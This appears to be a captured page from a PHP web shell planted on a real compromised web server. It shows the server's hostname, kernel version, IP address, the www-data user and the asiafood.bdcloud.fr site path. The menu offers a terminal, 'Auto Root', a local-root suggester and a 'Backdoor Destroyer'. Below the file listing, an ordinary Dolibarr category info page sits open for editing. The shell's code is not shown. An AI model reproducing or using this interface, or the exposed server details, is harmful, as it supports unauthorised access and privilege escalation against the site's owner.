Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
asiafood.bdcloud.fr /
categories /
Delete
Unzip
Name
Size
Permission
Date
Action
admin
[ DIR ]
drwxr-xr-x
2025-11-08 11:16
class
[ DIR ]
drwxr-xr-x
2025-11-08 11:16
card.php
9.32
KB
-rwxr-xr-x
2021-01-30 17:40
edit.php
5.72
KB
-rwxr-xr-x
2021-01-30 17:40
index.php
7.97
KB
-rwxr-xr-x
2021-01-30 17:40
info.php
3.14
KB
-rwxr-xr-x
2021-01-30 17:40
photos.php
9.88
KB
-rwxr-xr-x
2021-01-30 17:40
traduction.php
12.24
KB
-rwxr-xr-x
2021-01-30 17:40
viewcat.php
36.09
KB
-rwxr-xr-x
2021-01-30 17:40
Save
Rename
<?php /* Copyright (C) 2005-2006 Laurent Destailleur <eldy@users.sourceforge.net> * Copyright (C) 2005-2009 Regis Houssin <regis.houssin@inodbox.com> * Copyright (C) 2017 Ferran Marcet <fmarcet@2byte.es> * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <https://www.gnu.org/licenses/>. */ /** * \file htdocs/categories/info.php * \ingroup categories * \brief Category info page */ require '../main.inc.php'; require_once DOL_DOCUMENT_ROOT.'/core/lib/functions2.lib.php'; require_once DOL_DOCUMENT_ROOT.'/categories/class/categorie.class.php'; require_once DOL_DOCUMENT_ROOT.'/core/lib/categories.lib.php'; if (!$user->rights->categorie->lire) { accessforbidden(); } // Load translation files required by the page $langs->loadLangs(array('categories', 'sendings')); $socid = 0; $id = GETPOST('id', 'int'); // Security check if ($user->socid) $socid = $user->socid; $result = restrictedArea($user, 'categorie', $id, '&category'); $object = new Categorie($db); if (!$object->fetch($id) > 0) { dol_print_error($db); exit; } $type = $object->type; if (is_numeric($type)) $type = Categorie::$MAP_ID_TO_CODE[$type]; // For backward compatibility /* * View */ $form = new Form($db); llxHeader('', $langs->trans('Categories'), ''); //$object->info($object->id); $title = Categorie::$MAP_TYPE_TITLE_AREA[$type]; $head = categories_prepare_head($object, $type); dol_fiche_head($head, 'info', $langs->trans($title), -1, 'category'); $backtolist = (GETPOST('backtolist') ? GETPOST('backtolist') : DOL_URL_ROOT.'/categories/index.php?leftmenu=cat&type='.$type); $linkback = '<a href="'.$backtolist.'">'.$langs->trans("BackToList").'</a>'; $object->next_prev_filter = ' type = '.$type; $object->ref = $object->label; $morehtmlref = '<br><div class="refidno"><a href="'.DOL_URL_ROOT.'/categories/index.php?leftmenu=cat&type='.$type.'">'.$langs->trans("Root").'</a> >> '; $ways = $object->print_all_ways(" >> ", '', 1); foreach ($ways as $way) { $morehtmlref .= $way."<br>\n"; } $morehtmlref .= '</div>'; dol_banner_tab($object, 'label', $linkback, ($user->socid ? 0 : 1), 'label', 'label', $morehtmlref, '&type='.$type, 0, '', '', 1); print '<br>'; print '<div class="fichecenter">'; print '<div class="underbanner clearboth"></div>'; print '<br>'; print '<table "border centpercent tableforfield">'; print '<tr><td>'; dol_print_object_info($object); print '</td></tr>'; print '</table>'; print '</div>'; dol_fiche_end(); // End of page llxFooter(); $db->close();